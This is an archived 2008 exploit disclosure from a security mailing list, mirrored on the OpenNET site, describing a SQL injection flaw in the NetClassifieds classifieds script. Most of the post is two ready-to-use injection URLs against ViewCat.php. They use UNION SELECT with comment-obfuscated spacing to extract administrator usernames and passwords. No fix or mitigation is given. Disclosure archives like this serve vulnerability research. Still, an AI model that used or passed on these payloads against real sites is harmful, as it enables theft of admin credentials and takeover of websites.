The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


NetClassifieds Sql Injection


<< Previous INDEX Search src / Print Next >>
Date: 23 Apr 2008 01:12:26 -0000
From: [email protected]
To: [email protected]
Subject: NetClassifieds Sql Injection
X-Virus-Scanned: antivirus-gw at tyumen.ru

Aria-Security Team (Persian Security Team)
http://Aria-Security.Net (Persian)
http://Aria-Security.com (ENG)
--------------------------------------------
Greetz: Aura, imm02tal, Null, Kinglet, Mormoroth
http://www.scriptdevelopers.net/ (tested on NetClassifieds)
Original Post @ http://forum.aria-security.com/showthread.php?p=107#

ViewCat.php?CatID=-1/**/union/**/select/**/1,username,3/**/from/**/administrators/*
ViewCat.php?CatID=-1/**/union/**/select/**/1,2,user_passowrd/**/from/**/administrators/*


Note: other NetClassfields Product maybe vulnerable with the same vuln. 

Regards, 
The-0utl4w


<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру